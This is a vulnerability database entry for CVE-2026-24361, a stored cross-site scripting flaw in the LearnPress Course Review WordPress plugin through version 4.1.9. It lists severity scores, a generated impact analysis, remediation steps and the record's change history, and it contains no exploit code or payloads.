Description
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThimPress LearnPress &#8211; Course Review learnpress-course-review allows Stored XSS.This issue affects LearnPress &#8211; Course Review: from n/a through <= 4.1.9.
Published: 2026-01-22
Score: 6.5 Medium
EPSS: < 1% Very Low
KEV: No
Impact: Stored Cross-site Scripting (client‑side code injection)
Action: Patch
AI Analysis

Impact

The plugin accepts arbitrary user input in review fields without proper neutralization and stores it for future rendering. The result is a stored cross‑site scripting flaw (CWE‑79) that can let an attacker inject and execute malicious JavaScript in the browsers of any visitor who views affected review pages, potentially enabling credential theft, session hijacking, or defacement.

Affected Systems

The vulnerability affects the ThimPress LearnPress – Course Review WordPress plugin for all releases up through version 4.1.9. No more recent versions are covered by this description.

Risk and Exploitability

The CVSS base score of 6.5 indicates a medium severity issue, while the EPSS of less than 1% points to a low likelihood of exploitation at the time of analysis. The flaw resides in the browser context; an attacker only needs to submit a review containing malicious script, which will then run whenever other users view that review. The vulnerability is not currently listed in CISA’s KEV catalog and there is no advanced attack surface beyond the browser. Overall, the risk is moderate but the exploitation probability is relatively low.

Generated by OpenCVE AI on April 16, 2026 at 02:02 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Update the LearnPress – Course Review plugin to the latest available version (greater than 4.1.9) or a patched release that properly sanitizes review input.
  • If an upgrade is not immediately possible, disable or remove the review feature from the site or restrict review submission to trusted users only.
  • Apply additional sanitization by filtering or escaping review content during output; for example, ensure the plugin uses WordPress’s wp_kses or sanitize_comment_text() functions to neutralize potentially dangerous input.

Generated by OpenCVE AI on April 16, 2026 at 02:02 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

History

Fri, 23 Jan 2026 16:45:00 +0000

Type Values Removed Values Added
First Time appeared Thimpress
Thimpress learnpress
Wordpress
Wordpress wordpress
Vendors & Products Thimpress
Thimpress learnpress
Wordpress
Wordpress wordpress

Thu, 22 Jan 2026 23:00:00 +0000

Type Values Removed Values Added
Description Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThimPress LearnPress &#8211; Course Review learnpress-course-review allows Stored XSS.This issue affects LearnPress &#8211; Course Review: from n/a through <= 4.1.9.
Title WordPress LearnPress – Course Review plugin <= 4.1.9 - Cross Site Scripting (XSS) vulnerability
Weaknesses CWE-79
References
Metrics cvssV3_1

{'score': 6.5, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L'}

ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Subscriptions

Thimpress Learnpress
Wordpress Wordpress
cve-icon MITRE

Status: PUBLISHED

Assigner: Patchstack

Published:

Updated: 2026-04-01T14:14:08.392Z

Reserved: 2026-01-22T14:42:24.567Z

Link: CVE-2026-24361

cve-icon Vulnrichment

Updated: 2026-01-22T20:34:47.018Z

cve-icon NVD

Status : Deferred

Published: 2026-01-22T17:16:39.820

Modified: 2026-04-15T00:35:42.020

Link: CVE-2026-24361

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-04-16T02:15:21Z

Weaknesses